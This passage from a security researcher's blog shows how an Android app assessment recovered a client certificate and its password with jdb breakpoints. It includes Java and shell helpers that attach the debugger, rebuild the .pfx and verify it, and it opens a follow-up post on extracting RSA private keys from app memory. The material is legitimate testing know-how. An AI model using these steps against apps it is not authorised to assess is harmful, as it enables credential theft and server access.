<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDB Command reference - </span><a href="http://droiddebugger.blogspot.com/2012/05/command-reference-for-jdb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://droiddebugger.blogspot.com/2012/05/command-reference-for-jdb.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Command line Android debugging - </span><a href="http://codeseekah.com/2012/02/16/command-line-android-development-debugging/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://codeseekah.com/2012/02/16/command-line-android-development-debugging/</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Debugging for the Client Certificate</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point I knew exactly where breakpoints were needed to obtain the client certificate and its password. I set breakpoints in the functions that invoked the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">method of the </span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/KeyStore.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance that held the client certificate, launched the application, and then browsed to the functionality that exercised the code paths leading to those breakpoints. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After hitting the breakpoint, I used the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dump</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> command to inspect the instance variable and invoked its methods (jdb's </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">eval</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> can call methods on a live object) to retrieve the important information. The instance variable of interest was of class </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The Java class under analysis retrieved the client certificate and its password with the following calls before feeding them to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">method:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It called a method </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">b()</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on its instance variable </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to obtain the certificate password and converted it to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It called a method </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">a()</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on its instance variable </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to obtain the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation of the client certificate and wrapped it in a </span><a href="http://docs.oracle.com/javase/7/docs/api/java/io/ByteArrayInputStream.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">ByteArrayInputStream</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following screenshot shows the rundown leading up to the client certificate and the password.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElMlGHq4dQt737X2Bm9J67-XQn1g16L25llQ6Ta0E41geLG1rYRj6VnPszVnIgUm4ygmOSNi4hyphenhyphenHu1yyV5D-5NIy32ve7m0yFytYC-VLXscb_sVORNBI9dw8IyjVvq0sJyjYmuQCHAf06/s1600/jdb-and-content-hidden-client-info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElMlGHq4dQt737X2Bm9J67-XQn1g16L25llQ6Ta0E41geLG1rYRj6VnPszVnIgUm4ygmOSNi4hyphenhyphenHu1yyV5D-5NIy32ve7m0yFytYC-VLXscb_sVORNBI9dw8IyjVvq0sJyjYmuQCHAf06/s400/jdb-and-content-hidden-client-info.png" width="400" /></a></div>
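<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The attach procedure listed earlier and the breakpoint session just described, put together as one POSIX shell helper. This is an added example and not code from the original post: it assumes adb and the JDK's jdb are on PATH, a single connected device, and that the caller supplies the package name, the fully qualified class.method to break in (the post does not name the class that calls KeyStore.load) and an optional local port. The jdb commands in the comments use the obfuscated names g, a() and b() from the post and assume the breakpoint sits in an instance method of the class that owns field g.</span></div>

```sh
#!/bin/sh
# Added example, not from the original post: attach jdb to a running Android app.
# Caveat: only debuggable apps (android:debuggable="true" in the manifest, or a
# device with ro.debuggable=1) expose a JDWP transport; anything else never shows
# up in `adb jdwp` and cannot be attached to this way.

# pid_of_package PACKAGE
#   Reads `ps` output on stdin and prints the PID of the exact process name.
#   Both the old toolbox and the newer toybox layouts put the PID in column 2
#   and the process name in the last column. The exact match avoids picking a
#   secondary process such as com.example.app:remote by accident.
pid_of_package() {
  awk -v pkg="$1" '$NF == pkg { print $2; exit }'
}

# attach_jdb PACKAGE CLASS.METHOD [PORT]
#   PACKAGE       e.g. com.example.app                       (placeholder)
#   CLASS.METHOD  breakpoint target, e.g. com.example.app.c.d (placeholder)
attach_jdb() {
  pkg=$1; bp=$2; port=${3:-8700}
  # Android 8+ ships toybox ps, which needs -A to list other users' processes;
  # older toolbox ps lists everything but treats -A as a name filter, so run
  # both forms and let the first exact match win. tr strips the CR that older
  # adb versions append to every line of `adb shell` output.
  pid=$(adb shell 'ps -A 2>/dev/null; ps 2>/dev/null' | tr -d '\r' | pid_of_package "$pkg")
  [ -n "$pid" ] || { echo "$pkg is not running" >&2; return 1; }
  # Forward a local TCP port to the process's JDWP transport.
  adb forward "tcp:$port" "jdwp:$pid" || return 1
  # Queue the breakpoint command, then hand stdin to the terminal for the
  # interactive part. Once the breakpoint fires, the commands used in the post are:
  #   where              stack trace, confirms you are in the caller of KeyStore.load
  #   locals             arguments and locals of the current frame
  #   dump this.g        fields of the instance variable g
  #   eval this.g.b()    the certificate password (a String)
  #   dump this.g.a()    the certificate bytes, printed as {48, -126, ...}
  #   cont               resume the app
  { printf 'stop in %s\n' "$bp"; cat; } | jdb -attach "localhost:$port"
}

# ./jdb-attach.sh attach com.example.app com.example.app.c.d 8700   (placeholders)
case "${1:-}" in
  attach) attach_jdb "$2" "$3" "$4" ;;
esac
```

<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the breakpoint class has not been loaded yet, jdb reports the breakpoint as deferred and sets it once the class loads, so it is fine to attach before navigating to the functionality that triggers the KeyStore code path.</span></div>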
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After obtaining the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dump of the client certificate, I created the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pfx</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file with the following Java code and then imported it into my browser's certificate store and into the web proxy (the import prompts for the password recovered from </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">b()</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">). </span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">import java.io.FileOutputStream;</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">import java.io.IOException;</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">public class PfxCreatorFromByteArray {</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>public static void main(String... args) throws IOException {</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// Contains the byte[] for the client certificate, as dumped from the app</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>byte[] pfx = {48, -126, </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">&lt;more bytes here&gt;</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}; </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>FileOutputStream fos = new FileOutputStream("client-cert.pfx");</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>fos.write(pfx);</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>fos.close();</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
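<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Java snippet above writes a byte[] literal to disk. As an added example that is not part of the original post, the same step in POSIX shell, starting directly from the {48, -126, ...} text that jdb's dump prints, followed by the two checks worth doing before importing the file anywhere: that the bytes form one complete DER SEQUENCE whose encoded length matches the file size (a PKCS#12 PFX is an outer SEQUENCE, so a truncated or padded paste fails here), and that keytool can open it with the recovered password. The file name and password are placeholders, and the byte lists in the usage comment are constructed samples, not the post's data.</span></div>

```sh
#!/bin/sh
# Added example, not from the original post: rebuild a .pfx from a jdb byte[]
# dump and sanity-check it before importing it into a browser or proxy.

# java_bytes_to_file FILE
#   Reads text such as "{48, -126, 4, 0}" (the form jdb's dump prints for a
#   byte[]) on stdin and writes the raw bytes to FILE. Java bytes are signed,
#   so -126 must become 0x82: awk maps every value to an octal escape and a
#   single printf emits them all. Anything that is not a value in -128..127
#   (a stray "=" or a mangled paste) makes the function fail instead of
#   silently writing zero bytes.
java_bytes_to_file() {
  esc=$(tr -d '{} \n\r\t' | tr ',' '\n' | awk '
        NF == 0 { next }
        $0 !~ /^-?[0-9]+$/ || $0 < -128 || $0 > 127 { exit 1 }
        { printf "\\%03o", ($0 + 256) % 256 }') || return 1
  printf "$esc" > "$1"
}

# der_total_length FILE
#   Prints header+content length of the outer DER SEQUENCE in FILE, or fails
#   if the file does not start with a SEQUENCE tag (0x30) and a definite length.
der_total_length() {
  f=$1
  set -- $(od -An -tx1 -N 6 "$f")          # first six bytes as hex words
  [ $# -ge 2 ] && [ "$1" = "30" ] || return 1
  l=$((0x$2))
  if [ "$l" -lt 128 ]; then                 # short form: one length byte
    echo $((2 + l)); return 0
  fi
  n=$((l - 128))                            # long form: n length bytes follow
  shift 2
  [ "$n" -ge 1 ] && [ "$n" -le 4 ] && [ $# -ge "$n" ] || return 1
  len=0; i=0
  while [ "$i" -lt "$n" ]; do
    len=$(( len * 256 + 0x$1 )); shift; i=$((i + 1))
  done
  echo $((2 + n + len))
}

# pfx_check FILE
#   Succeeds only when the DER length in the header matches the file size,
#   i.e. the dump was copied completely and nothing was appended.
pfx_check() {
  total=$(der_total_length "$1") || { echo "$1: not a DER SEQUENCE" >&2; return 1; }
  size=$(wc -c < "$1" | tr -d ' ')
  [ "$total" -eq "$size" ] || { echo "$1: DER header says $total bytes, file has $size" >&2; return 1; }
}

# pfx_list FILE PASSWORD
#   Opens the PKCS#12 with the password recovered from g.b() and lists what is
#   inside: alias, owner and issuer DN, and whether a PrivateKeyEntry is present.
#   keytool ships with the same JDK as jdb; openssl pkcs12 -info works as well.
pfx_list() {
  keytool -list -v -keystore "$1" -storetype PKCS12 -storepass "$2"
}

# Usage (placeholders): paste the {...} part of jdb's dump into dump.txt, then
#   java_bytes_to_file client-cert.pfx < dump.txt && pfx_check client-cert.pfx \
#     && pfx_list client-cert.pfx 'recovered-password'
```

<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The length check is deliberately structural rather than cryptographic: it catches the common copy-paste failures (a dump cut off at a terminal line limit, or a trailing prompt swept up with the data) without needing the password, and keytool then proves that the password from b() and the bytes from a() belong together.</span></div>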
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following image shows successful client certificate import.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kQHR0CwOGp5gZcxZ6yMPxD-WeU4TTQxc6krPEwf-sFapuCfknCBqTQZWcJNRsGIOgU09thLYSnBExTMNNQ1SmRSMfMERQuHYbSASQVA1q-mD5Zqr68yDc2LzZ_ZYOpPn-1VrxtsJxaxu/s1600/trusted-root-certificate-private-key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kQHR0CwOGp5gZcxZ6yMPxD-WeU4TTQxc6krPEwf-sFapuCfknCBqTQZWcJNRsGIOgU09thLYSnBExTMNNQ1SmRSMfMERQuHYbSASQVA1q-mD5Zqr68yDc2LzZ_ZYOpPn-1VrxtsJxaxu/s400/trusted-root-certificate-private-key.png" width="400" /></a></div>
<br />
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The imported client certificate then allowed me to reach and assess the server-side portion of the application. Beyond the client certificate, combining the static and dynamic analysis techniques also allowed me to retrieve other sensitive material, such as initialization vectors and encryption keys, from the application. </span></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com7tag:blogger.com,1999:blog-4663432300421783651.post-11678477424398278562013-10-22T03:00:00.000-07:002013-10-27T22:19:42.896-07:00Extracting RSAPrivateCrtKey and Certificates from an Android Process<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1.1500000000000001; text-align: left; white-space: pre-wrap;">An Android application that I assessed recently had extensive cryptographic controls to protect client-server communication and to secure its local storage. To top that, its source code was completely obfuscated. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Combined, these two factors made the application a great candidate for reversing. In this post I will detail the portion of the work where I dumped </span><a href="http://en.wikipedia.org/wiki/X.509" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">X.509</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> certificates and constructed an RSA private key (</span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/interfaces/RSAPrivateCrtKey.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) from the Android application's memory using the Eclipse Memory Analyzer Tool (</span><a href="http://www.eclipse.org/mat/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">MAT</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) and Java code.</span></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Analyzing Android Memory with Eclipse MAT</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Eclipse MAT is primarily a Java heap analyzer that has extensive usage beyond its primary purpose of identifying memory leaks. It can be used to identify and dump sensitive information in Android application memory, perform basic memory forensics, and more. If you are new to Android memory analysis, I recommend that you get intimate with this tool for its obvious benefits. The following articles can help you get started.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://help.eclipse.org/kepler/index.jsp?topic=/org.eclipse.mat.ui.help/welcome.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">help.eclipse.org</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
